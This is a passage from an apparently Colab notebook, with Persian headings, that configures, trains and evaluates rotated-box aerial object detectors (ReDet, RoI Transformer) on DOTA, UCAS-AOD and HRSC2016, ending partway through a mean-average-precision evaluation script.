type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False))\ntest_cfg = dict(\n rpn=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n # score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n# soft-nms is also supported for rcnn testing\n # e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)\n)\n# dataset settings\ndataset_type = 'DOTADataset'\n#################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/dota1024new/'\n#################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images/',\n img_scale=(1024, 1024),\n 
img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'test1024/DOTA_test1024.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'test1024/images',\n # img_prefix=data_root + 'val1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=1,\n hooks=[\n dict(type='TextLoggerHook'),\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 12\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/faster_rcnn_obb_r50_fpn_1x_dota'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]",
"_____no_output_____"
]
],
[
[
"# UCAS_AOD config",
"_____no_output_____"
]
],
[
[
"# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py\n%%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py\n##########این کانفیگ از ریپازیتوری اصلی کپی شده\n\n# model settings\nmodel = dict(\n type='RoITransformer',\n pretrained='modelzoo://resnet50',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n ##############################################\n num_classes=2,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n ###################################################\n num_classes=2,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n # score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), 
max_per_img=1000)\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n\n# soft-nms is also supported for rcnn testing\n # e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)\n)\n# dataset settings\ndataset_type = 'UCASAOD'\n######################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/UCAS-AOD/'\n######################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'Train/mmtrain.json',\n img_prefix=data_root + 'Train/images/',\n img_scale=(659, 1280),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'val/mmval.json',\n img_prefix=data_root + 'val/images',\n img_scale=(659, 1280),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'Test/mmtest.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'Test/images',\n # img_prefix=data_root + 'val1024/images',\n # ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',\n # img_prefix=data_root + 'test1024_ms/images',\n img_scale=(659, 1280),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=6)\n# yapf:disable\nlog_config = dict(\n interval=6,\n hooks=[\n dict(type='TextLoggerHook'),\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 12\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]",
"_____no_output_____"
],
[
"# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py\n# %%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659.py\n##########این کانفیگ از ریپازیتوری اصلی کمک گرفته است\n\n# model settings\nmodel = dict(\n type='RoITransformer',\n pretrained='modelzoo://resnet50',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=3,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=3,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n # score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 
2000)\n # score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n\n# soft-nms is also supported for rcnn testing\n # e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)\n)\n# dataset settings\ndataset_type = 'UCASAOD'\n######################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/UCAS_AOD659/'\n######################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval659/DOTA_trainval659.json',\n img_prefix=data_root + 'trainval659/images/',\n img_scale=(659, 659),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval659/DOTA_trainval659.json',\n img_prefix=data_root + 'trainval659/images',\n img_scale=(659, 659),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'test659/DOTA_test659.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'test659/images',\n # img_prefix=data_root + 'val1024/images',\n # ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',\n # img_prefix=data_root + 'test1024_ms/images',\n img_scale=(659, 659),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=6)\n# yapf:disable\nlog_config = dict(\n interval=6,\n hooks=[\n dict(type='TextLoggerHook'),\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 36\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]",
"_____no_output_____"
]
],
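[
[
"# Optional sanity check (not part of the original notebook): load one of the configs written above with mmcv's\n# Config to confirm it parses and that data_root / work_dir / total_epochs are what you expect before training.\nfrom mmcv import Config\ncfg = Config.fromfile('/content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py')\nprint(cfg.data_root, cfg.work_dir, cfg.total_epochs)",
"_____no_output_____"
]
],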
[
[
"# آموزش شبکه",
"_____no_output_____"
]
],
[
[
"!python tools/train.py /content/AerialDetection/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py --resume_from /content/AerialDetection/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_11.pth",
"_____no_output_____"
],
[
"!mv /content/AerialDetection/data/dota /content/drive/MyDrive/dota_dataaaaa",
"_____no_output_____"
]
],
[
[
"# UCAS_AOD آموزش",
"_____no_output_____"
]
],
[
[
"%cd /content/ReDet\n!python tools/train.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py \\\n# --resume_from /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_6.pth",
"_____no_output_____"
],
[
"%cd /content/ReDet\n!python tools/train.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659.py \\\n# --resume_from /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_6.pth",
"_____no_output_____"
]
],
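[
[
"# Optional (not part of the original notebook): the configs above enable TensorboardLoggerHook, so the training\n# curves can be watched from Colab with the TensorBoard magic while a run is in progress.\n%load_ext tensorboard\n%tensorboard --logdir /content/ReDet/work_dirs",
"_____no_output_____"
]
],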
[
[
"# تست کردن شبکه",
"_____no_output_____"
],
[
"ReDet_re50_refpn_1x_dota1 test",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \\\n /content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/results.pkl ",
"_____no_output_____"
],
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \\\n /content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/valresults.pkl ",
"_____no_output_____"
]
],
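[
[
"# Optional inspection (not part of the original notebook): results.pkl is the serialized test output; it is\n# typically a list with one entry per test image, each entry holding per-class arrays of rotated detections.\nimport mmcv\nresults = mmcv.load('/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/results.pkl')\nprint(len(results), 'images')\nprint(type(results[0]))",
"_____no_output_____"
]
],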
[
[
"faster_rcnn_RoITrans_r50_fpn_1x_dota test",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/results.pkl ",
"_____no_output_____"
],
[
"#new-----dotanew1024\n!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/results.pkl ",
"_____no_output_____"
],
[
"#val\n!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/valresults.pkl ",
"_____no_output_____"
]
],
[
[
"faster_rcnn_obb_r50_fpn_1x_dota.py test",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/results.pkl ",
"_____no_output_____"
],
[
"#new-----dotanew1024\n!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/results.pkl ",
"_____no_output_____"
],
[
"#val\n!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/valresults.pkl ",
"_____no_output_____"
]
],
[
[
"# faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD **testing**",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py \\\n /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_36.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/results.pkl ",
"_____no_output_____"
]
],
[
[
"# **HSRC2016** ReDet",
"_____no_output_____"
]
],
[
[
"# generate results\n!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_3x_hrsc2016.py \\\n /content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/ReDet_re50_refpn_3x_hrsc2016-d1b4bd29.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/results.pkl\n\n# evaluation\n# remeber to modify the results path in hrsc2016_evaluation.py\n# !python /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py ",
"_____no_output_____"
]
],
[
[
"/content/ReDet/DOTA_devkit/hrsc2016_evaluation.py",
"_____no_output_____"
]
],
[
[
"%%writefile /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py\n\n# --------------------------------------------------------\n# dota_evaluation_task1\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Jian Ding, based on code from Bharath Hariharan\n# --------------------------------------------------------\n\n\"\"\"\n To use the code, users should to config detpath, annopath and imagesetfile\n detpath is the path for 15 result files, for the format, you can refer to \"http://captain.whu.edu.cn/DOTAweb/tasks.html\"\n search for PATH_TO_BE_CONFIGURED to config the paths\n Note, the evaluation is on the large scale images\n\"\"\"\nimport xml.etree.ElementTree as ET\nimport os\n#import cPickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport polyiou\nfrom functools import partial\n\ndef parse_gt(filename):\n \"\"\"\n :param filename: ground truth file to parse\n :return: all instances in a picture\n \"\"\"\n objects = []\n with open(filename, 'r') as f:\n while True:\n line = f.readline()\n if line:\n splitlines = line.strip().split(' ')\n object_struct = {}\n if (len(splitlines) < 9):\n continue\n object_struct['name'] = splitlines[8]\n\n if (len(splitlines) == 9):\n object_struct['difficult'] = 0\n elif (len(splitlines) == 10):\n object_struct['difficult'] = int(splitlines[9])\n object_struct['bbox'] = [float(splitlines[0]),\n float(splitlines[1]),\n float(splitlines[2]),\n float(splitlines[3]),\n float(splitlines[4]),\n float(splitlines[5]),\n float(splitlines[6]),\n float(splitlines[7])]\n objects.append(object_struct)\n else:\n break\n return objects\ndef voc_ap(rec, prec, use_07_metric=False):\n \"\"\" ap = voc_ap(rec, prec, [use_07_metric])\n Compute VOC AP given precision and recall.\n If use_07_metric is true, uses the\n VOC 07 11 point method (default:False).\n \"\"\"\n if use_07_metric:\n # 11 point metric\n ap = 0.\n for t in np.arange(0., 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.\n else:\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], rec, [1.]))\n mpre = np.concatenate(([0.], prec, [0.]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n\ndef voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n # cachedir,\n ovthresh=0.5,\n use_07_metric=False):\n \"\"\"rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n [ovthresh],\n [use_07_metric])\n Top level function that does the PASCAL VOC evaluation.\n detpath: Path to detections\n detpath.format(classname) should produce the detection results file.\n annopath: Path to annotations\n annopath.format(imagename) should be the xml annotations file.\n imagesetfile: Text file containing the list of images, one image per line.\n classname: Category name (duh)\n cachedir: Directory for caching the annotations\n [ovthresh]: Overlap threshold (default = 0.5)\n [use_07_metric]: Whether to use VOC07's 11 point AP computation\n (default False)\n \"\"\"\n # assumes detections are in detpath.format(classname)\n # assumes annotations are in annopath.format(imagename)\n # assumes imagesetfile is a text file with each line an image name\n # cachedir caches the 
annotations in a pickle file\n\n # first load gt\n #if not os.path.isdir(cachedir):\n # os.mkdir(cachedir)\n #cachefile = os.path.join(cachedir, 'annots.pkl')\n # read list of images\n with open(imagesetfile, 'r') as f:\n lines = f.readlines()\n imagenames = [x.strip() for x in lines]\n #print('imagenames: ', imagenames)\n #if not os.path.isfile(cachefile):\n # load annots\n recs = {}\n for i, imagename in enumerate(imagenames):\n #print('parse_files name: ', annopath.format(imagename))\n recs[imagename] = parse_gt(annopath.format(imagename))\n #if i % 100 == 0:\n # print ('Reading annotation for {:d}/{:d}'.format(\n # i + 1, len(imagenames)) )\n # save\n #print ('Saving cached annotations to {:s}'.format(cachefile))\n #with open(cachefile, 'w') as f:\n # cPickle.dump(recs, f)\n #else:\n # load\n #with open(cachefile, 'r') as f:\n # recs = cPickle.load(f)\n\n # extract gt objects for this class\n class_recs = {}\n npos = 0\n for imagename in imagenames:\n R = [obj for obj in recs[imagename] if obj['name'] == classname]\n bbox = np.array([x['bbox'] for x in R])\n difficult = np.array([x['difficult'] for x in R]).astype(np.bool)\n det = [False] * len(R)\n npos = npos + sum(~difficult)\n class_recs[imagename] = {'bbox': bbox,\n 'difficult': difficult,\n 'det': det}\n\n # read dets from Task1* files\n detfile = detpath.format(classname)\n with open(detfile, 'r') as f:\n lines = f.readlines()\n\n splitlines = [x.strip().split(' ') for x in lines]\n image_ids = [x[0] for x in splitlines]\n confidence = np.array([float(x[1]) for x in splitlines])\n\n #print('check confidence: ', confidence)\n\n BB = np.array([[float(z) for z in x[2:]] for x in splitlines])\n\n # sort by confidence\n sorted_ind = np.argsort(-confidence)\n sorted_scores = np.sort(-confidence)\n\n #print('check sorted_scores: ', sorted_scores)\n #print('check sorted_ind: ', sorted_ind)\n\n ## note the usage only in numpy not for list\n BB = BB[sorted_ind, :]\n image_ids = [image_ids[x] for x in sorted_ind]\n #print('check imge_ids: ', image_ids)\n #print('imge_ids len:', len(image_ids))\n # go down dets and mark TPs and FPs\n nd = len(image_ids)\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n for d in range(nd):\n ##############################################################################################################\n filename, file_extension = os.path.splitext(image_ids[d])\n R = class_recs[ filename]\n # R = class_recs[image_ids[d]]##############################################################################\n\n bb = BB[d, :].astype(float)\n ovmax = -np.inf\n BBGT = R['bbox'].astype(float)\n\n ## compute det bb with each BBGT\n\n if BBGT.size > 0:\n # compute 